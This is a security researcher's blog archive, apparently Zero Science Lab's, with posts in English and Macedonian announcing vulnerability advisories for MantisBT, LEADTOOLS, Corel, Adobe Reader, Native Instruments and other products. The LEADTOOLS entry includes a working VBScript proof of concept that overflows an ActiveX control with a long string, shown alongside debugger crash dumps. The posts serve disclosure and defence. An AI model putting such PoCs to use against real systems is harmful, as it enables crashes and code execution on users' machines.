Posts Tagged ‘ advisories

net4visions.com Multiple Products Multiple Vulnerabilities

iGallery, iManager and iBrowser plugins for WYSIWYG editors like tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor suffers from multiple vulnerabilities including: Reflected (Non-Persistent) Cross-Site Scripting, Local File Inclusion, File Disclosure, Arbitrary Deletion.

The iManager plugin has 3 different parameters which can trigger the mentioned above vulnerabilities. ‘d’, ‘lang’ and ‘dir’. iBrowser and iGallery use the same scripts and parameters for corresponding issues. ‘dir’ and ‘lang’. Advisories bellow:

ZSL-2011-5046iGallery Plugin v1.0.0 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5045iManager Plugin v1.2.8 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5044iBrowser Plugin v1.4.1 (dir) Remote Cross-Site Scripting Vulnerability
ZSL-2011-5043iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability
ZSL-2011-5042iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability
ZSL-2011-5041iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability

Информациско безбедносна проценка на веб апликации (изучување на случај)

PART I: http://it.com.mk/informacisko-bezbednosna-procenka-na-veb-aplikacii-izuchuvanje-na-sluchaj-del-i/
PART II: http://it.com.mk/informacisko-bezbednosna-procenka-na-veb-aplikacii-izuchuvanje-na-sluchaj-del-ii/

Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC

A buffer overflow vulnerability has been identified in Macro Express Pro, possibly this vuln may exist in the regular version and older versions of Macro Express and Macro Express Pro. We’ve reported the issue to the vendor thru their bug reporting system (http://www.macros.com/bugreport.htm) and did not receive any response for confirmation or cooperation.

We’ve managed to overwrite few registers while debugging the application, thus executed arbitrary code on the affected system.

You can take a look at the advisory here: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php

Mantis Bug Tracker безбедносни предупредувања и закрпи

Денеска, Zero Science Lab во соработка со MantisBT Group објави безбедносни предупредувања и закрпи за популарниот систем за следење на грешки или багови MantisBT (отворен код). Се работи за неколку сериозни ранливости со чија помош, напаѓачот може да дојде до осетливи информации на заразениот систем со пропатување на директориуми или пак да извршува HTML код во корисничкиот прелистувач со помош на XSS напад.

Слабоста се наоѓа во “upgrade_unattended.php” скриптата, која се наоѓа во “admin” папката. При повикување на параметарот “db_type” било со GET или POST методата, апликацијата не извшува доволно и контролирано санирање на корисничкото внесување при што се откриваат системски информации.

По дефинирање, се работи за Reflected (Non-persistent) Cross-Site Scripting, Local File Inclusion/Disclosure и Path Disclosure ранливости. Ние извршивме тестирање на “live” веб-страници (со дозвола), и заклучивме да ги рангираме ранливостите како Medium Risk (xss) и High Risk (lfi).

Голема благодарност до Дејвид Хикс и Виктор Боктор од MantisBT групата, кои одговорија на пријавените слабости и реагираа во најбрз временски период како и во објавување на закрпа и предупредувања после кое следеше објавување на 1.2.4 верзијата. Иако Дејвид напоменуваше дека имало “Warning” дека папката “admin” треба да се избрише после инсталација, јас такво предупредување не видов поради различните оперативни системи и PHP пермисии, и заклучивме дека многу инсталации на интернетот (кои користат MantisBT) се со присатен “admin” фолдер.

Освен јавно објавените предупредувања, објавивме и официјален Google Dork на Exploit-DB заедницата: http://www.exploit-db.com/ghdb/3651/

Предупредувањата од ZSL како и од MantisBT можете да ги погледнете подолу:

ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Cross-Site Scripting & Path Disclosure Vulnerability
ZSL-2010-4983: MantisBT <=1.2.3 (db_type) Local File Inclusion Vulnerability
MantisBT: http://www.mantisbt.org/bugs/view.php?id=12607

Ажурирајте. ;}

Native Instruments Multiple Products Multiple Vulnerabilities

Zero Science Lab has discovered multiple vulnerabilities in various products developed by Native Instruments. Upon the discoveries, we’ve contacted the vendor to report all the issues. Their technical support, at first, were confused about our e-mail sent to them, thinking that we have troubles using their software. As we explained to them in details in the next e-mail, about QA, about security bulletins, about public disclosure policy, the security industry etc. they finally forwarded the conversation e-mails to the “corresponding” department, which we think that they don’t even have any related team to respond for these kind of incidents. Anywayz, no one shows interest from Native Instruments, thus are informed about the date of public disclosure (this post).

We haven’t tested all the software packages that NI offers, but we think that the rest of the apps are vulnerable to the similar vulns that we found, maybe more.

Here are the advisories:

Native Instruments Service Center 2.2.5 Local Privilege Escalation VulnerabilityZSL-2010-4981
Native Instruments Massive 1.1.4 KSD File Handling Use-After-Free VulnerabilityZSL-2010-4980
Native Instruments Kontakt 4 Player NKI File Syntactic Analysis Buffer Overflow PoCZSL-2010-4979
Native Instruments Reaktor 5 Player v5.5.1 Heap Memory Corruption VulnerabilityZSL-2010-4978
Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow VulnerabilityZSL-2010-4977
Native Instruments Kontakt 4 Player v4.1.3 Insecure Library Loading VulnerabilityZSL-2010-4976
Native Instruments Service Center 2.2.5 Insecure Library Loading VulnerabilityZSL-2010-4975
Native Instruments Reaktor 5 Player v5.5.1 Insecure Library Loading VulnerabilityZSL-2010-4974
Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading VulnerabilityZSL-2010-4973

Some SSs:

LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote
vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in
different objects included in the Common Dialogs class.

Vulnerable Objects/OCX Dialogs (Win32):

1. ActiveX Common Dialogs (Web) ——————–> LtocxWebDlgu.dll
2. ActiveX Common Dialogs (Effects) —————-> LtocxEfxDlgu.dll
3. ActiveX Common Dialogs (Image) ——————> LtocxImgDlgu.dll
4. ActiveX Common Dialogs (Image Effects) ———-> LtocxImgEfxDlgu.dll
5. ActiveX Common Dialogs (Image Document)———-> LtocxImgDocDlgu.dll
6. ActiveX Common Dialogs (Color) ——————> LtocxClrDlgu.dll
7. ActiveX Common Dialogs (File) ——————-> LtocxFileDlgu.dll

Advisory: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4961.php

LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.

Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

===============================================================

(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax        ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh      ds:0023:00410040=??

==================================================================

Registers:
————————————————–
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC

EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000

ArgDump:
————————————————–
EBP+8    016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12    0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16    00000000
EBP+20    0013EF6C -> BAAD0008
EBP+24    100255BC -> 10014840 -> Asc: @H@H
EBP+28    0013EDB8 -> 00000000

EBP+8    00150000 -> 000000C8
EBP+12    00410039
EBP+16    7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20    00000000
EBP+24    00410041
EBP+28    7C80FF12 -> 9868146A

CompanyName        LEAD Technologies, Inc.
FileDescription        LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion        16,5,0,2
InternalName        LTRTNU
LegalCopyright        © 1991-2009 LEAD Technologies, Inc.
OriginalFileName        LTRTNU.DLL
ProductName        LEADTOOLS® for Win32
ProductVersion        16.5.0.0

Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Exception Code: ACCESS_VIOLATION

Disasm: 7C912F4E    MOV [ECX],AX    (ntdll.dll)
Disasm: 7C96C540    CMP BYTE PTR [EBX+7],FF    (ntdll.dll)

Exception Code: BREAKPOINT

Disasm: 7C90120E    INT3    (ntdll.dll)

Seh Chain:
————————————————–
1     7C839AC0     KERNEL32.dll
2     FC2950         VBSCRIPT.dll
3     7C90E900     ntdll.dll

7C912F4E    MOV [ECX],AX            <— CRASH
7C96C540    CMP BYTE PTR [EBX+7],FF        <— CRASH
7C90120F    RETN                <— CRASH

==================================================================

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

PoC:

<object classid=’clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F’ id=’target’ />
<script language=’vbscript’>

targetFile = “C:\Program Files\RFGen40\LtocxTwainu.dll”
prototype  = “Property Let AppName As String”
memberName = “AppName”
progid     = “LTRASTERTWAINLib_U.LEADRasterTwain_U”
argCount   = 1

arg1=String(9236, “A”)

target.AppName = arg1

</script>

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960_pvt.php

Multiple Vendors DLL Hijacking Exploits

Токму така :)

H D Moore (Metasploit Project) по изјавувањето дека пронашол 40-тина ранливости во Microsoft производи, на 22-ри август го објави и приборот за ревизија на DLL библиотеките и нивно “киднапирање” или hijacking. Се работи за DLLHijackAuditKit v2 со кој извршувате проверка за сите екстензии регистрирани во вашиот систем и нивни соодветни библиотеки, како и нивна експлоатација. Приборот се користи едноставно, ревизијата трае од 15-30 минути и потоа се креираат експлоатациски кодови во фолдер Exploits кои можете да ги користите за било какви цели :)

Повеќе: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html и http://blog.metasploit.com/2010/08/better-faster-stronger.html.

Се разбира, тимот на Zero Science Lab за да не остане покус, изврши ревизија и на еден од своите лабораториските системи и пронајде доста ранливости кои следуваат…

- Adobe Device Central CS5 v3.0.1.0 (dwmapi.dll) DLL Hijacking Exploit

- Adobe Extension Manager CS5 v5.0.298 (dwmapi.dll) DLL Hijacking Exploit

- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

Откако беше објавен DLL Hijack Audit Kit v2 приборот, во светот се објавија повеќе од 100-тина експлоити во рок од неколку дена, поради кое, Microsoft реагираше веднаш со објавување на алатка која ги заобиколуваше овие слабости.

Извор: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

Алатката можете да ја преземете на следниов линк: http://support.microsoft.com/kb/2264107 (услов: валиден оперативен систем)

Вакви експлоити сеуште се објавуваат додека го читате текстов и е застрашувачки. Внимавајте од кого преземате податоци и бидете безбедни.

Досега, најбрзо објавување на ваквите експлоити можете да ги пратите на Exploit-DB: http://www.exploit-db.com/local/

Zero Science Lab

Corel WordPerfect Office X5 and Corel Presentations X5 File Handling Vulnerabilities

- Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

– Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC

Corel Corporation

http://www.corel.com

Version: 15.0.0.357 (Standard Edition)

– Summary: Corel® WordPerfect® Office X5 – Standard Edition is the essential
office suite for word processing, spreadsheets, presentations and email.
Chosen over Microsoft® Office by millions of longtime users, it integrates
the latest productivity software with the best of the Web. Work faster and
collaborate more efficiently with all-new Web services, new Microsoft® Office
SharePoint® support, more PDF tools and even better compatibility with Microsoft
Office. It’s everything you expect in an office suite—for less.

– Desc: Corel WordPerfect and Corel Presentations X5 is prone to a remote buffer overflow vulnerability because
the application fails to perform adequate boundary checks on user supplied input with
.WPD (WordPerfect Document) and .SHW (Presentations Slide Show) file. Attackers may exploit this issue to execute arbitrary
code in the context of the application. Failed attacks will cause denial-of-service
conditions.

– Tested On: Microsoft Windows XP Professional SP3 (English)

– Vulnerability Discovered By: Gjoko ‘LiquidWorm’ Krstic

– liquidworm gmail com

– Zero Science Lab – http://www.zeroscience.mk

– 09.07.2010

– Vendor status:

[09.07.2010] Vulnerability discovered.
[09.07.2010] Initial contact with the vendor.
[12.07.2010] No reply from vendor.
[12.07.2010] Public advisory released.

Details:

Corel Presentations X5 15.0.0.357 (shw) Remote Buffer Preoccupation PoC
Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Title:

Adobe Reader 9.3.2 (CoolType.dll) Remote Memory Corruption / DoS Vulnerability

Summary:

Adobe Reader software is the global standard for electronic document sharing. It is the only PDF
file viewer that can open and interact with all PDF documents. Use Adobe Reader to view, search,
digitally sign, verify, print, and collaborate on Adobe PDF files.

Vendor:

Adobe Systems Incorporated

Product Web Page:

http://www.adobe.com/

Version tested:

9.3.2
9.3.1

Description:

Adobe Reader suffers from a remote memory corruption vulnerability that causes the application to
crash while processing the malicious .PDF file. The issue is triggered when the reader tries to
initialize the CoolType Typography Engine (cooltype.dll). This vulnerability also affects and crashes
major browsers like: Mozilla Firefox, Opera and Apple Safari. Google Chrome & IE does not crash.
Talking about Blended Threat Vulnerabilities ;).

———————————————————————————–

(bd0.e14): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=313100ee ebx=0211a722 ecx=00000031 edx=02e091a4 esi=00017e58 edi=00000000
eip=08075dc2 esp=0012d478 ebp=0012d488 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
CoolType!CTInit+0x2f827:
08075dc2 660fb644322c movzx ax,byte ptr [edx+esi+2Ch] ds:0023:02e21028=??

———————————————————————————–

Tested On:

Microsoft Windows XP Professional SP3 (English)
Microsoft Windows XP Professional SP2 (English)
Microsoft Windows 7 Ultimate
GNU/Linux Ubuntu Desktop 9.10 (i386) 32-bit
GNU/Linux Fedora 10 (Cambridge) / 2.6.27.41-170.2.117.fc10.i686

Vendor Status:

18.04.2010 – Vendor informed.
18.04.2010 – Vendor replied.
07.05.2010 – Asked vendor for confirmation.
07.05.2010 – Vendor confirms vulnerability.
03.06.2010 – Asked vendor for status.
03.06.2010 – Vendor replied.
24.06.2010 – Vendor reveals patch release date.
29.06.2010 – Coordinated public advisory.

Advisory Details:

Zero Science Lab Advisory ID: ZSL-2010-4943
Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4943.php
Adobe Advisory ID: APSB10-15
Advisory: http://www.adobe.com/support/security/bulletins/apsb10-15.html
CVE ID: CVE-2010-2204

Live Demo:

http://www.zeroscience.mk/codes/thricer.pdf

Vulnerability Discovered By:

Gjoko ‘LiquidWorm’ Krstic

liquidworm gmail com

Zero Science Lab – http://www.zeroscience.mk

Повеќе: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4943.php